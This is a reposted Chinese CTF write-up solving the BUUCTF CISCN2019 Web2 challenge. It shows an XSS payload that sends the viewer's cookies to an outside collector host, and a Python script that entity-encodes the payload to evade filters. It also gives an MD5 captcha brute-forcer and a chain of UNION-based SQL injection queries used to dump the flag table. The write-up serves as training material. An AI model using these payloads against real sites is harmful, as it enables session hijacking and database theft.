BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

admin 2022年4月25日02:10:13CTF专场评论12 views2507字阅读8分21秒阅读模式

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

参考:

https://blog.csdn.net/weixin_44677409/article/details/100741998

经测试发现存在以下页面:

index.phpadmin.phplogin.phpregister.phppost.phpcommitbug.phpabout.php

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

admin.php没有权限登录,联系下文估计是要得到admin的session登录

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

投稿存在XSS,但是存在一些过滤,使用Markup

转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新颜面

使用题目提供的站内XSS平台

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

添加windows.location.href,并删去if判断那一段

(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=arHAGx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();1


然后利用脚本,进行编码绕过,并且执行

xss='''(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=arHAGx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''output = ""for c in xss:    output += "&#" + str(ord(c))
print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")

然后把这些payload插入投稿文章地址:

http://24175362-da9c-4f99-bb8d-110e10bfb9bf.node3.buuoj.cn/post/1b34bb5a26804f2410d6746d2129bb7b.html

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

在反馈页面反馈,刚刚发布的那篇文章,是的管理员去查看带有XSS的文章

MD5验证码脚本:

import hashlib
def func(md5_val): for x in range(999999, 100000000): md5_value=hashlib.md5(str(x)).hexdigest() if md5_value[:6]==md5_val: return str(x)
if __name__ == '__main__':    print func('b76301')

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

这里注意文章地址在反馈的时候要改成

http://web.node3.buuoj.cn/post/1b34bb5a26804f2410d6746d2129bb7b.html

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

XSS平台接收到一个来自内网访问的请求,这就是管理元的访问,使用这个PHPSESSION登录admin.php

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解


登陆成功,经过测试发现是个很简单的联合查询注入,一系列注入payload如下:

-2 union select 1,2,3#
-2 union select 1,database(),user()#
-2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ciscn'#
-2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'#
-2 union select 1,2,group_concat(flagg) from ciscn.flag#

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

原文来自CSDN博主「末 初」|侵删





BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解


中电运行是专业专注培养能源企业IT工匠和提供IT整体解决方案的服务商,也是能源互联网安全专家。

为方便大家沟通,中电运行开通“中电运行交流群”,诚挚欢迎能源企业和相关人士,以及对网络安全感兴趣的群体加入本群,真诚交流,互相学习BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解。想加入我们就给我们留言吧BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

小白必读!寰宇卫士手把手教你栈溢出(上)

手把手教你栈溢出(中)

手把手教你栈溢出(下)

《信息安全知识》之法律关键常识汇总

CTF经验分享|带你入门带你飞!

BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

原文始发于微信公众号(寰宇卫士):BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月25日02:10:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  BUUCTF:[CISCN2019 华东北赛区]Web2-解题步骤详解 http://cn-sec.com/archives/939156.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: